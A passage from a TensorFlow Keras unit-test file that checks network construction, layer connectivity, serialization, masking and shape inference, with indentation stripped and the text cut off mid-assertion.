y2 = layer.apply(x2)
self.assertEqual(len(layer.losses), 3)
self.assertEqual(len(layer.get_losses_for(x1)), 1)
self.assertEqual(len(layer.get_losses_for(x2)), 1)
self.assertEqual(len(layer.get_losses_for(None)), 1)
network = network_lib.Network(x2, y2)
self.assertEqual(len(network.losses), 3)
self.assertEqual(len(network.get_losses_for(x1)), 1)
self.assertEqual(len(network.get_losses_for(x2)), 1)
self.assertEqual(len(network.get_losses_for(None)), 1)
x3 = input_layer_lib.Input(shape=(1,))
_ = layer.apply(x3)
self.assertEqual(len(network.losses), 4)
x4 = input_layer_lib.Input(shape=(1,))
_ = network(x4)
self.assertEqual(len(network.losses), 5)
self.assertEqual(len(network.get_losses_for(x2)), 1)
self.assertEqual(len(network.get_losses_for(x4)), 1)
self.assertEqual(len(network.get_losses_for(None)), 1)
@test_util.run_in_graph_and_eager_modes()
def testTopologicalAttributes(self):
# test layer attributes / methods related to cross-layer connectivity.
a = input_layer_lib.Input(shape=(32,), name='input_a')
b = input_layer_lib.Input(shape=(32,), name='input_b')
# test input, output, input_shape, output_shape
test_layer = keras.layers.Dense(16, name='test_layer')
a_test = test_layer(a)
self.assertEqual(test_layer.input, a)
self.assertEqual(test_layer.output, a_test)
self.assertEqual(test_layer.input_shape, (None, 32))
self.assertEqual(test_layer.output_shape, (None, 16))
# test `get_*_at` methods
dense = keras.layers.Dense(16, name='dense_1')
a_2 = dense(a)
b_2 = dense(b)
self.assertEqual(dense.get_input_at(0), a)
self.assertEqual(dense.get_input_at(1), b)
self.assertEqual(dense.get_output_at(0), a_2)
self.assertEqual(dense.get_output_at(1), b_2)
self.assertEqual(dense.get_input_shape_at(0), (None, 32))
self.assertEqual(dense.get_input_shape_at(1), (None, 32))
self.assertEqual(dense.get_output_shape_at(0), (None, 16))
self.assertEqual(dense.get_output_shape_at(1), (None, 16))
# Test invalid value for attribute retrieval.
with self.assertRaises(ValueError):
dense.get_input_at(2)
with self.assertRaises(AttributeError):
new_dense = keras.layers.Dense(16)
_ = new_dense.input
with self.assertRaises(AttributeError):
new_dense = keras.layers.Dense(16)
_ = new_dense.output
with self.assertRaises(AttributeError):
new_dense = keras.layers.Dense(16)
_ = new_dense.output_shape
with self.assertRaises(AttributeError):
new_dense = keras.layers.Dense(16)
_ = new_dense.input_shape
with self.assertRaises(AttributeError):
new_dense = keras.layers.Dense(16)
a = input_layer_lib.Input(shape=(3, 32))
a = input_layer_lib.Input(shape=(5, 32))
a_2 = dense(a)
b_2 = dense(b)
_ = new_dense.input_shape
with self.assertRaises(AttributeError):
new_dense = keras.layers.Dense(16)
a = input_layer_lib.Input(shape=(3, 32))
a = input_layer_lib.Input(shape=(5, 32))
a_2 = dense(a)
b_2 = dense(b)
_ = new_dense.output_shape
@test_util.run_in_graph_and_eager_modes()
def testTopologicalAttributesMultiOutputLayer(self):
class PowersLayer(keras.layers.Layer):
def call(self, inputs):
return [inputs**2, inputs**3]
x = input_layer_lib.Input(shape=(32,))
test_layer = PowersLayer()
p1, p2 = test_layer(x) # pylint: disable=not-callable
self.assertEqual(test_layer.input, x)
self.assertEqual(test_layer.output, [p1, p2])
self.assertEqual(test_layer.input_shape, (None, 32))
self.assertEqual(test_layer.output_shape, [(None, 32), (None, 32)])
@test_util.run_in_graph_and_eager_modes()
def testTopologicalAttributesMultiInputLayer(self):
class AddLayer(keras.layers.Layer):
def call(self, inputs):
assert len(inputs) == 2
return inputs[0] + inputs[1]
a = input_layer_lib.Input(shape=(32,))
b = input_layer_lib.Input(shape=(32,))
test_layer = AddLayer()
y = test_layer([a, b]) # pylint: disable=not-callable
self.assertEqual(test_layer.input, [a, b])
self.assertEqual(test_layer.output, y)
self.assertEqual(test_layer.input_shape, [(None, 32), (None, 32)])
self.assertEqual(test_layer.output_shape, (None, 32))
@test_util.run_deprecated_v1
def testBasicNetwork(self):
# minimum viable network
x = input_layer_lib.Input(shape=(32,))
dense = keras.layers.Dense(2)
y = dense(x)
network = network_lib.Network(x, y, name='dense_network')
# test basic attributes
self.assertEqual(network.name, 'dense_network')
self.assertEqual(len(network.layers), 2) # InputLayer + Dense
self.assertEqual(network.layers[1], dense)
self.assertEqual(network.weights, dense.weights)
self.assertEqual(network.trainable_weights, dense.trainable_weights)
self.assertEqual(network.non_trainable_weights, dense.non_trainable_weights)
# test callability on Input
x_2 = input_layer_lib.Input(shape=(32,))
y_2 = network(x_2)
self.assertEqual(y_2.shape.as_list(), [None, 2])
# test callability on regular tensor
x_2 = array_ops.placeholder(dtype='float32', shape=(None, 32))
y_2 = network(x_2)
self.assertEqual(y_2.shape.as_list(), [None, 2])
# test network `trainable` attribute
network.trainable = False
self.assertEqual(network.weights, dense.weights)
self.assertEqual(network.trainable_weights, [])
self.assertEqual(network.non_trainable_weights,
dense.trainable_weights + dense.non_trainable_weights)
@test_util.run_in_graph_and_eager_modes
def test_trainable_weights(self):
a = keras.layers.Input(shape=(2,))
b = keras.layers.Dense(1)(a)
model = keras.models.Model(a, b)
weights = model.weights
self.assertListEqual(model.trainable_weights, weights)
self.assertListEqual(model.non_trainable_weights, [])
model.trainable = False
self.assertListEqual(model.trainable_weights, [])
self.assertListEqual(model.non_trainable_weights, weights)
model.trainable = True
self.assertListEqual(model.trainable_weights, weights)
self.assertListEqual(model.non_trainable_weights, [])
model.layers[1].trainable = False
self.assertListEqual(model.trainable_weights, [])
self.assertListEqual(model.non_trainable_weights, weights)
# sequential model
model = keras.models.Sequential()
model.add(keras.layers.Dense(1, input_dim=2))
weights = model.weights
self.assertListEqual(model.trainable_weights, weights)
self.assertListEqual(model.non_trainable_weights, [])
model.trainable = False
self.assertListEqual(model.trainable_weights, [])
self.assertListEqual(model.non_trainable_weights, weights)
model.trainable = True
self.assertListEqual(model.trainable_weights, weights)
self.assertListEqual(model.non_trainable_weights, [])
model.layers[0].trainable = False
self.assertListEqual(model.trainable_weights, [])
self.assertListEqual(model.non_trainable_weights, weights)
@test_util.run_deprecated_v1
def test_layer_call_arguments(self):
# Test the ability to pass and serialize arguments to `call`.
inp = keras.layers.Input(shape=(2,))
x = keras.layers.Dense(3)(inp)
x = keras.layers.Dropout(0.5)(x, training=True)
model = keras.models.Model(inp, x)
# Would be `dropout/cond/Merge` by default
self.assertTrue(model.output.op.name.endswith('dropout/mul_1'))
# Test that argument is kept when applying the model
inp2 = keras.layers.Input(shape=(2,))
out2 = model(inp2)
self.assertTrue(out2.op.name.endswith('dropout/mul_1'))
# Test that argument is kept after loading a model
config = model.get_config()
model = keras.models.Model.from_config(config)
self.assertTrue(model.output.op.name.endswith('dropout/mul_1'))
def test_node_construction(self):
# test basics
a = keras.layers.Input(shape=(32,), name='input_a')
b = keras.layers.Input(shape=(32,), name='input_b')
with self.assertRaises(ValueError):
_ = keras.layers.Input(shape=(32,), batch_shape=(10, 32))
with self.assertRaises(ValueError):
_ = keras.layers.Input(shape=(32,), unknown_kwarg=None)
self.assertListEqual(a.shape.as_list(), [None, 32])
a_layer, a_node_index, a_tensor_index = a._keras_history
b_layer, _, _ = b._keras_history
self.assertEqual(len(a_layer._inbound_nodes), 1)
self.assertEqual(a_tensor_index, 0)
node = a_layer._inbound_nodes[a_node_index]
self.assertEqual(node.outbound_layer, a_layer)
self.assertListEqual(node.inbound_layers, [])
self.assertListEqual(node.input_tensors, [a])
self.assertListEqual(node.input_shapes, [(None, 32)])
self.assertListEqual(node.output_tensors, [a])
self.assertListEqual(node.output_shapes, [(None, 32)])
dense = keras.layers.Dense(16, name='dense_1')
a_2 = dense(a)
b_2 = dense(b)
self.assertEqual(len(dense._inbound_nodes), 2)
self.assertEqual(len(dense._outbound_nodes), 0)
self.assertEqual(dense._inbound_nodes[0].inbound_layers, a_layer)
self.assertEqual(dense._inbound_nodes[0].outbound_layer, dense)
self.assertEqual(dense._inbound_nodes[1].inbound_layers, b_layer)
self.assertEqual(dense._inbound_nodes[1].outbound_layer, dense)
self.assertEqual(dense._inbound_nodes[0].input_tensors, a)
self.assertEqual(dense._inbound_nodes[1].input_tensors, b)
# test layer properties
test_layer = keras.layers.Dense(16, name='test_layer')
a_test = test_layer(a)
self.assertListEqual(test_layer.kernel.shape.as_list(), [32, 16])
self.assertEqual(test_layer.input, a)
self.assertEqual(test_layer.output, a_test)
self.assertEqual(test_layer.input_shape, (None, 32))
self.assertEqual(test_layer.output_shape, (None, 16))
self.assertEqual(dense.get_input_at(0), a)
self.assertEqual(dense.get_input_at(1), b)
self.assertEqual(dense.get_output_at(0), a_2)
self.assertEqual(dense.get_output_at(1), b_2)
self.assertEqual(dense.get_input_shape_at(0), (None, 32))
self.assertEqual(dense.get_input_shape_at(1), (None, 32))
self.assertEqual(dense.get_output_shape_at(0), (None, 16))
self.assertEqual(dense.get_output_shape_at(1), (None, 16))
self.assertEqual(dense.get_input_mask_at(0), None)
self.assertEqual(dense.get_input_mask_at(1), None)
self.assertEqual(dense.get_output_mask_at(0), None)
self.assertEqual(dense.get_output_mask_at(1), None)
@test_util.run_in_graph_and_eager_modes()
def test_multi_input_layer(self):
with self.cached_session():
# test multi-input layer
a = keras.layers.Input(shape=(32,), name='input_a')
b = keras.layers.Input(shape=(32,), name='input_b')
dense = keras.layers.Dense(16, name='dense_1')
a_2 = dense(a)
b_2 = dense(b)
merged = keras.layers.concatenate([a_2, b_2], name='merge')
self.assertListEqual(merged.shape.as_list(), [None, 16 * 2])
merge_layer, merge_node_index, merge_tensor_index = merged._keras_history
self.assertEqual(merge_node_index, 0)
self.assertEqual(merge_tensor_index, 0)
self.assertEqual(len(merge_layer._inbound_nodes), 1)
self.assertEqual(len(merge_layer._outbound_nodes), 0)
self.assertEqual(len(merge_layer._inbound_nodes[0].input_tensors), 2)
self.assertEqual(len(merge_layer._inbound_nodes[0].inbound_layers), 2)
c = keras.layers.Dense(64, name='dense_2')(merged)
d = keras.layers.Dense(5, name='dense_3')(c)
model = keras.models.Model(inputs=[a, b], outputs=[c, d], name='model')
self.assertEqual(len(model.layers), 6)
output_shapes = model.compute_output_shape([(None, 32), (None, 32)])
self.assertListEqual(output_shapes[0].as_list(), [None, 64])
self.assertListEqual(output_shapes[1].as_list(), [None, 5])
self.assertListEqual(
model.compute_mask([a, b], [None, None]), [None, None])
# we don't check names of first 2 layers (inputs) because
# ordering of same-level layers is not fixed
self.assertListEqual([l.name for l in model.layers][2:],
['dense_1', 'merge', 'dense_2', 'dense_3'])
self.assertListEqual([l.name for l in model._input_layers],
['input_a', 'input_b'])
self.assertListEqual([l.name for l in model._output_layers],
['dense_2', 'dense_3'])
# actually run model
fn = keras.backend.function(model.inputs, model.outputs)
input_a_np = np.random.random((10, 32))
input_b_np = np.random.random((10, 32))
fn_outputs = fn([input_a_np, input_b_np])
self.assertListEqual([x.shape for x in fn_outputs], [(10, 64), (10, 5)])
# test get_source_inputs
self.assertListEqual(keras.engine.get_source_inputs(c), [a, b])
# serialization / deserialization
json_config = model.to_json()
recreated_model = keras.models.model_from_json(json_config)
recreated_model.compile('rmsprop', 'mse')
self.assertListEqual([l.name for l in recreated_model.layers][2:],
['dense_1', 'merge', 'dense_2', 'dense_3'])
self.assertListEqual([l.name for l in recreated_model._input_layers],
['input_a', 'input_b'])
self.assertListEqual([l.name for l in recreated_model._output_layers],
['dense_2', 'dense_3'])
fn = keras.backend.function(recreated_model.inputs,
recreated_model.outputs)
input_a_np = np.random.random((10, 32))
input_b_np = np.random.random((10, 32))
fn_outputs = fn([input_a_np, input_b_np])
self.assertListEqual([x.shape for x in fn_outputs], [(10, 64), (10, 5)])
def test_multi_output_layer_output_names(self):
inp = keras.layers.Input(name='inp', shape=(None,), dtype=dtypes.float32)
class _MultiOutput(keras.layers.Layer):
def call(self, x):
return x + 1., x + 2.
out = _MultiOutput(name='out')(inp)
model = keras.models.Model(inp, out)
self.assertEqual(['out', 'out_1'], model.output_names)
self.assertAllClose([2., 3.], model(1.))
@test_util.run_deprecated_v1
def test_recursion(self):
with self.cached_session():
a = keras.layers.Input(shape=(32,), name='input_a')
b = keras.layers.Input(shape=(32,), name='input_b')
dense = keras.layers.Dense(16, name='dense_1')
a_2 = dense(a)
b_2 = dense(b)
merged = keras.layers.concatenate([a_2, b_2], name='merge')
c = keras.layers.Dense(64, name='dense_2')(merged)
d = keras.layers.Dense(5, name='dense_3')(c)
model = keras.models.Model(inputs=[a, b], outputs=[c, d], name='model')
e = keras.layers.Input(shape=(32,), name='input_e')
f = keras.layers.Input(shape=(32,), name='input_f')
self.assertEqual(len(model.inputs), 2)
g, h = model([e, f])
self.assertEqual(len(model.inputs), 2)
self.assertEqual(g.name, 'model/dense_2/BiasAdd:0')
self.assertListEqual(g.shape.as_list(), c.shape.as_list())
self.assertListEqual(h.shape.as_list(), d.shape.as_list())
# test separate manipulation of different layer outputs
i = keras.layers.Dense(7, name='dense_4')(h)
final_model = keras.models.Model(
inputs=[e, f], outputs=[i, g], name='final')
self.assertEqual(len(final_model.inputs), 2)
self.assertEqual(len(final_model.outputs), 2)
self.assertEqual(len(final_model.layers), 4)
# we don't check names of first 2 layers (inputs) because
# ordering of same-level layers is not fixed
self.assertListEqual([layer.name for layer in final_model.layers][2:],
['model', 'dense_4'])
self.assertListEqual(
model.compute_mask([e, f], [None, None]), [None, None])
self.assertListEqual(
final_model.compute_output_shape([(10, 32), (10, 32)]), [(10, 7),
(10, 64)])
# run recursive model
fn = keras.backend.function(final_model.inputs, final_model.outputs)
input_a_np = np.random.random((10, 32))
input_b_np = np.random.random((10, 32))
fn_outputs = fn([input_a_np, input_b_np])
self.assertListEqual([x.shape for x in fn_outputs], [(10, 7), (10, 64)])
# test serialization
model_config = final_model.get_config()
recreated_model = keras.models.Model.from_config(model_config)
fn = keras.backend.function(recreated_model.inputs,
recreated_model.outputs)
input_a_np = np.random.random((10, 32))
input_b_np = np.random.random((10, 32))
fn_outputs = fn([input_a_np, input_b_np])
self.assertListEqual([x.shape for x in fn_outputs], [(10, 7), (10, 64)])
@test_util.run_in_graph_and_eager_modes()
def test_multi_input_multi_output_recursion(self):
with self.cached_session():
# test multi-input multi-output
a = keras.layers.Input(shape=(32,), name='input_a')
b = keras.layers.Input(shape=(32,), name='input_b')
dense = keras.layers.Dense(16, name='dense_1')
a_2 = dense(a)
b_2 = dense(b)
merged = keras.layers.concatenate([a_2, b_2], name='merge')
c = keras.layers.Dense(64, name='dense_2')(merged)
d = keras.layers.Dense(5, name='dense_3')(c)
model = keras.models.Model(inputs=[a, b], outputs=[c, d], name='model')
j = keras.layers.Input(shape=(32,), name='input_j')
k = keras.layers.Input(shape=(32,), name='input_k')
_, n = model([j, k])
o = keras.layers.Input(shape=(32,), name='input_o')
p = keras.layers.Input(shape=(32,), name='input_p')
q, _ = model([o, p])
self.assertListEqual(n.shape.as_list(), [None, 5])
self.assertListEqual(q.shape.as_list(), [None, 64])
s = keras.layers.concatenate([n, q], name='merge_nq')
self.assertListEqual(s.shape.as_list(), [None, 64 + 5])
# test with single output as 1-elem list
multi_io_model = keras.models.Model([j, k, o, p], [s])
fn = keras.backend.function(multi_io_model.inputs, multi_io_model.outputs)
fn_outputs = fn([
np.random.random((10, 32)), np.random.random((10, 32)),
np.random.random((10, 32)), np.random.random((10, 32))
])
self.assertListEqual([x.shape for x in fn_outputs], [(10, 69)])
# test with single output as tensor
multi_io_model = keras.models.Model([j, k, o, p], s)
fn = keras.backend.function(multi_io_model.inputs, multi_io_model.outputs)
fn_outputs = fn([
np.random.random((10, 32)), np.random.random((10, 32)),
np.random.random((10, 32)), np.random.random((10, 32))
])
# note that the output of the function will still be a 1-elem list
self.assertListEqual([x.shape for x in fn_outputs], [(10, 69)])
# test serialization
model_config = multi_io_model.get_config()
recreated_model = keras.models.Model.from_config(model_config)
fn = keras.backend.function(recreated_model.inputs,
recreated_model.outputs)
fn_outputs = fn([
np.random.random((10, 32)), np.random.random((10, 32)),
np.random.random((10, 32)), np.random.random((10, 32))
])
# note that the output of the function will still be a 1-elem list
self.assertListEqual([x.shape for x in fn_outputs], [(10, 69)])
config = model.get_config()
keras.models.Model.from_config(config)
model.summary()
json_str = model.to_json()
keras.models.model_from_json(json_str)
if yaml is not None:
yaml_str = model.to_yaml()
keras.models.model_from_yaml(yaml_str)
@test_util.run_in_graph_and_eager_modes()
def test_invalid_graphs(self):
a = keras.layers.Input(shape=(32,), name='input_a')
b = keras.layers.Input(shape=(32,), name='input_b')
dense = keras.layers.Dense(16, name='dense_1')
a_2 = dense(a)
b_2 = dense(b)
merged = keras.layers.concatenate([a_2, b_2], name='merge')
c = keras.layers.Dense(64, name='dense_2')(merged)
d = keras.layers.Dense(5, name='dense_3')(c)
model = keras.models.Model(inputs=[a, b], outputs=[c, d], name='model')
# input is not an Input tensor
j = keras.layers.Input(shape=(32,), name='input_j')
j = keras.layers.Dense(32)(j)
k = keras.layers.Input(shape=(32,), name='input_k')
m, n = model([j, k])
with self.assertRaises(Exception):
keras.models.Model([j, k], [m, n])
# disconnected graph
j = keras.layers.Input(shape=(32,), name='input_j')
k = keras.layers.Input(shape=(32,), name='input_k')
m, n = model([j, k])
with self.assertRaises(Exception):
keras.models.Model([j], [m, n])
# redundant outputs
j = keras.layers.Input(shape=(32,), name='input_j')
k = keras.layers.Input(shape=(32,), name='input_k')
m, n = model([j, k])
keras.models.Model([j, k], [m, n, n])
# redundant inputs
j = keras.layers.Input(shape=(32,), name='input_j')
k = keras.layers.Input(shape=(32,), name='input_k')
m, n = model([j, k])
with self.assertRaises(Exception):
keras.models.Model([j, k, j], [m, n])
# i have not idea what I'm doing: garbage as inputs/outputs
j = keras.layers.Input(shape=(32,), name='input_j')
k = keras.layers.Input(shape=(32,), name='input_k')
m, n = model([j, k])
with self.assertRaises(Exception):
keras.models.Model([j, k], [m, n, 0])
@test_util.run_deprecated_v1
def test_raw_tf_compatibility(self):
# test calling layers/models on TF tensors
a = keras.layers.Input(shape=(32,), name='input_a')
b = keras.layers.Input(shape=(32,), name='input_b')
dense = keras.layers.Dense(16, name='dense_1')
a_2 = dense(a)
b_2 = dense(b)
merged = keras.layers.concatenate([a_2, b_2], name='merge')
c = keras.layers.Dense(64, name='dense_2')(merged)
d = keras.layers.Dense(5, name='dense_3')(c)
model = keras.models.Model(inputs=[a, b], outputs=[c, d], name='model')
j = keras.layers.Input(shape=(32,), name='input_j')
k = keras.layers.Input(shape=(32,), name='input_k')
self.assertEqual(len(model.inputs), 2)
m, n = model([j, k])
self.assertEqual(len(model.inputs), 2)
tf_model = keras.models.Model([j, k], [m, n])
j_tf = array_ops.placeholder(dtype=dtypes.float32, shape=(None, 32))
k_tf = array_ops.placeholder(dtype=dtypes.float32, shape=(None, 32))
m_tf, n_tf = tf_model([j_tf, k_tf])
self.assertListEqual(m_tf.shape.as_list(), [None, 64])
self.assertListEqual(n_tf.shape.as_list(), [None, 5])
# test merge
keras.layers.concatenate([j_tf, k_tf], axis=1)
keras.layers.add([j_tf, k_tf])
# test tensor input
x = array_ops.placeholder(shape=(None, 2), dtype=dtypes.float32)
keras.layers.InputLayer(input_tensor=x)
x = keras.layers.Input(tensor=x)
keras.layers.Dense(2)(x)
@test_util.run_in_graph_and_eager_modes()
def test_basic_masking(self):
a = keras.layers.Input(shape=(10, 32), name='input_a')
b = keras.layers.Masking()(a)
model = keras.models.Model(a, b)
self.assertEqual(model.output_mask.shape.as_list(), [None, 10])
@test_util.run_deprecated_v1
def testMaskingSingleInput(self):
class MaskedLayer(keras.layers.Layer):
def call(self, inputs, mask=None):
if mask is not None:
return inputs * mask
return inputs
def compute_mask(self, inputs, mask=None):
return array_ops.ones_like(inputs)
if context.executing_eagerly():
a = constant_op.constant([2] * 32)
mask = constant_op.constant([0, 1] * 16)
a._keras_mask = mask
b = MaskedLayer().apply(a)
self.assertTrue(hasattr(b, '_keras_mask'))
self.assertAllEqual(
self.evaluate(array_ops.ones_like(mask)),
self.evaluate(getattr(b, '_keras_mask')))
self.assertAllEqual(self.evaluate(a * mask), self.evaluate(b))
else:
x = input_layer_lib.Input(shape=(32,))
y = MaskedLayer()(x) # pylint: disable=not-callable
network = network_lib.Network(x, y)
# test callability on Input
x_2 = input_layer_lib.Input(shape=(32,))
y_2 = network(x_2)
self.assertEqual(y_2.shape.as_list(), [None, 32])
# test callability on regular tensor
x_2 = array_ops.placeholder(dtype='float32', shape=(None, 32))
y_2 = network(x_2)
self.assertEqual(y_2.shape.as_list(), [None, 32])
@test_util.run_deprecated_v1
def test_activity_regularization_with_model_composition(self):
def reg(x):
return math_ops.reduce_sum(x)
net_a_input = input_layer_lib.Input((2,))
net_a = net_a_input
net_a = keras.layers.Dense(2, kernel_initializer='ones',
use_bias=False,
activity_regularizer=reg)(net_a)
model_a = keras.Model([net_a_input], [net_a])
net_b_input = input_layer_lib.Input((2,))
net_b = model_a(net_b_input)
model_b = keras.Model([net_b_input], [net_b])
model_b.compile(optimizer='sgd', loss=None)
x = np.ones((1, 2))
loss = model_b.evaluate(x)
self.assertEqual(loss, 4.)
@keras_parameterized.run_all_keras_modes
def test_layer_sharing_at_heterogenous_depth(self):
x_val = np.random.random((10, 5))
x = input_layer_lib.Input(shape=(5,))
a = keras.layers.Dense(5, name='A')
b = keras.layers.Dense(5, name='B')
output = a(b(a(b(x))))
m = keras.models.Model(x, output)
m.run_eagerly = testing_utils.should_run_eagerly()
output_val = m.predict(x_val)
config = m.get_config()
weights = m.get_weights()
m2 = keras.models.Model.from_config(config)
m2.set_weights(weights)
output_val_2 = m2.predict(x_val)
self.assertAllClose(output_val, output_val_2, atol=1e-6)
@keras_parameterized.run_all_keras_modes
def test_layer_sharing_at_heterogenous_depth_with_concat(self):
input_shape = (16, 9, 3)
input_layer = input_layer_lib.Input(shape=input_shape)
a = keras.layers.Dense(3, name='dense_A')
b = keras.layers.Dense(3, name='dense_B')
c = keras.layers.Dense(3, name='dense_C')
x1 = b(a(input_layer))
x2 = a(c(input_layer))
output = keras.layers.concatenate([x1, x2])
m = keras.models.Model(inputs=input_layer, outputs=output)
m.run_eagerly = testing_utils.should_run_eagerly()
x_val = np.random.random((10, 16, 9, 3))
output_val = m.predict(x_val)
config = m.get_config()
weights = m.get_weights()
m2 = keras.models.Model.from_config(config)
m2.set_weights(weights)
output_val_2 = m2.predict(x_val)
self.assertAllClose(output_val, output_val_2, atol=1e-6)
@keras_parameterized.run_all_keras_modes
def test_explicit_training_argument(self):
a = keras.layers.Input(shape=(2,))
b = keras.layers.Dropout(0.5)(a)
base_model = keras.models.Model(a, b)
a = keras.layers.Input(shape=(2,))
b = base_model(a, training=False)
model = keras.models.Model(a, b)
x = np.ones((100, 2))
y = np.ones((100, 2))
model.compile(
optimizer='sgd',
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
loss = model.train_on_batch(x, y)
self.assertEqual(loss, 0) # In inference mode, output is equal to input.
a = keras.layers.Input(shape=(2,))
b = base_model(a, training=True)
model = keras.models.Model(a, b)
preds = model.predict(x)
self.assertEqual(np.min(preds), 0.) # At least one unit was dropped.
@keras_parameterized.run_all_keras_modes
def test_multi_output_model_with_none_masking(self):
def func(x):
return [x * 0.2, x * 0.3]
def output_shape(input_shape):
return [input_shape, input_shape]
i = keras.layers.Input(shape=(3, 2, 1))
o = keras.layers.Lambda(function=func, output_shape=output_shape)(i)
self.assertEqual(keras.backend.int_shape(o[0]), (None, 3, 2, 1))
self.assertEqual(keras.backend.int_shape(o[1]), (None, 3, 2, 1))
o = keras.layers.add(o)
model = keras.Model(i, o)
model.run_eagerly = testing_utils.should_run_eagerly()
i2 = keras.layers.Input(shape=(3, 2, 1))
o2 = model(i2)
model2 = keras.Model(i2, o2)
model2.run_eagerly = testing_utils.should_run_eagerly()
x = np.random.random((4, 3, 2, 1))
out = model2.predict(x)
assert out.shape == (4, 3, 2, 1)
self.assertAllClose(out, x * 0.2 + x * 0.3, atol=1e-4)
@keras_parameterized.run_all_keras_modes
def test_constant_initializer_with_numpy(self):
initializer = keras.initializers.Constant(np.ones((3, 2)))
model = keras.models.Sequential()
model.add(
keras.layers.Dense(2, input_shape=(3,), kernel_initializer=initializer))
model.add(keras.layers.Dense(3))
model.compile(
loss='mse',
optimizer='sgd',
metrics=['acc'],
run_eagerly=testing_utils.should_run_eagerly())
json_str = model.to_json()
keras.models.model_from_json(json_str)
if yaml is not None:
yaml_str = model.to_yaml()
keras.models.model_from_yaml(yaml_str)
def test_subclassed_error_if_init_not_called(self):
class MyNetwork(network_lib.Network):
def __init__(self):
self._foo = [keras.layers.Dense(10), keras.layers.Dense(10)]
with self.assertRaisesRegexp(RuntimeError, 'forgot to call'):
MyNetwork()
@test_util.run_in_graph_and_eager_modes()
def test_int_input_shape(self):
inputs = keras.Input(10)
self.assertEqual([None, 10], inputs.shape.as_list())
inputs_with_batch = keras.Input(batch_size=20, shape=5)
self.assertEqual([20, 5], inputs_with_batch.shape.as_list())
@test_util.run_in_graph_and_eager_modes()
def test_model_initialization(self):
# Functional model
inputs = input_layer_lib.Input(shape=(32,))
outputs = keras.layers.Dense(4)(inputs)
with self.assertRaisesRegexp(TypeError, 'unexpected argument'):
model = training.Model(inputs, outputs, name='m', trainable=False,
dtype='int64')
with self.assertRaisesRegexp(TypeError, 'unexpected argument'):
model = training.Model(inputs, outputs, name='m', trainable=False,
dynamic=False)
model = training.Model(inputs, outputs, name='m', trainable=False)
self.assertEqual('m', model.name)
self.assertFalse(model.trainable)
self.assertFalse(model.dynamic)
# Subclassed model
model = training.Model(name='subclassed', trainable=True, dtype='int64',
dynamic=True)
self.assertEqual('subclassed', model.name)
self.assertTrue(model.dynamic)
self.assertTrue(model.trainable)
w = model.add_weight('w', [], initializer=keras.initializers.Constant(1))
self.assertEqual(dtypes.int64, w.dtype)
class DeferredModeTest(test.TestCase):
@test_util.run_in_graph_and_eager_modes()
def testSimpleNetworkBuilding(self):
inputs = input_layer_lib.Input(shape=(32,))
if context.executing_eagerly():
self.assertEqual(inputs.dtype.name, 'float32')
self.assertEqual(inputs.shape.as_list(), [None, 32])
x = keras.layers.Dense(2)(inputs)
if context.executing_eagerly():
self.assertEqual(x.dtype.name, 'float32')
self.assertEqual(x.shape.as_list(), [None, 2])
outputs = keras.layers.Dense(4)(x)
network = network_lib.Network(inputs, outputs)
self.assertIsInstance(network, network_lib.Network)
if context.executing_eagerly():
# It should be possible to call such a network on EagerTensors.
inputs = constant_op.constant(
np.random.random((10, 32)).astype('float32'))
outputs = network(inputs)
self.assertEqual(outputs.shape.as_list(), [10, 4])
@test_util.run_in_graph_and_eager_modes()
def testMultiIONetworkBuilding(self):
input_a = input_layer_lib.Input(shape=(32,))
input_b = input_layer_lib.Input(shape=(16,))
a = keras.layers.Dense(16)(input_a)
class AddLayer(keras.layers.Layer):
def call(self, inputs):
return inputs[0] + inputs[1]
c = AddLayer()([a, input_b]) # pylint: disable=not-callable
c = keras.layers.Dense(2)(c)
network = network_lib.Network([input_a, input_b], [a, c])
if context.executing_eagerly():
a_val = constant_op.constant(
np.random.random((10, 32)).astype('float32'))
b_val = constant_op.constant(
np.random.random((10, 16)).astype('float32'))
outputs = network([a_val, b_val])
self.assertEqual(len(outputs), 2)
self.assertEqual(outputs[0].shape.as_list(), [10, 16])
self.assertEqual(outputs[1].shape.as_list(), [10, 2])
class DefaultShapeInferenceBehaviorTest(keras_parameterized.TestCase):
def _testShapeInference(self, model, input_shape, expected_output_shape):
input_value = np.random.random(input_shape)
output_value = model.predict(input_value)
self.assertEqual(output_value.shape, expected_output_shape)
@test_util.run_in_graph_and_eager_modes()
def testSingleInputCase(self):
class LayerWithOneInput(keras.layers.Layer):
def build(self, input_shape):
self.w = array_ops.ones(shape=(3, 4))
def call(self, inputs):
return keras.backend.dot(inputs, self.w)
inputs = input_layer_lib.Input(shape=(3,))
layer = LayerWithOneInput()
if context.executing_eagerly():
self.assertEqual(
layer.compute_output_shape((None, 3)).as_list(), [None, 4])
# As a side-effect, compute_output_shape builds the layer.
self.assertTrue(layer.built)
# We can still query the layer's compute_output_shape with compatible
# input shapes.
self.assertEqual(
layer.compute_output_shape((6, 3)).as_list(), [6, 4])
outputs = layer(inputs)
model = keras.Model(inputs, outputs)
self._testShapeInference(model, (2, 3), (2, 4))
@test_util.run_in_graph_and_eager_modes()
def testMultiInputOutputCase(self):
class MultiInputOutputLayer(keras.layers.Layer):
def build(self, input_shape):
self.w = array_ops.ones(shape=(3, 4))
def call(self, inputs):
a = keras.backend.dot(inputs[0], self.w)
b = a + inputs[1]
return [a, b]
input_a = input_layer_lib.Input(shape=(3,))
input_b = input_layer_lib.Input(shape=(4,))
output_a, output_b = MultiInputOutputLayer()([input_a, input_b])
model = keras.Model([input_a, input_b], [output_a, output_b])
output_a_val, output_b_val = model.predict(
[np.random.random((2, 3)), np.random.random((2, 4))])
self.assertEqual(output_a_val.shape, (2, 4))
self.assertEqual(output_b_val.shape, (2, 4))
@test_util.run_in_graph_and_eager_modes()
def testTrainingArgument(self):
class LayerWithTrainingArg(keras.layers.Layer):
def build(self, input_shape):
self.w = array_ops.ones(shape=(3, 4))
def call(self, inputs, training):
return keras.backend.dot(inputs, self.w)
inputs = input_layer_lib.Input(shape=(3,))
outputs = LayerWithTrainingArg()(inputs, training=False)
model = keras.Model(inputs, outputs)
self._testShapeInference(model, (2, 3), (2, 4))
@test_util.run_in_graph_and_eager_modes()
def testNoneInShape(self):
class Model(keras.Model):
def __init__(self):
super(Model, self).__init__()
self.conv1 = keras.layers.Conv2D(8, 3)
self.pool = keras.layers.GlobalAveragePooling2D()
self.fc = keras.layers.Dense(3)
def call(self, x):
x = self.conv1(x)
x = self.pool(x)
x = self.fc(x)
return x
model = Model()
model.build(tensor_shape.TensorShape((None, None, None, 1)))
self.assertTrue(model.built, 'Model should be built')
self.assertTrue(model.weights,
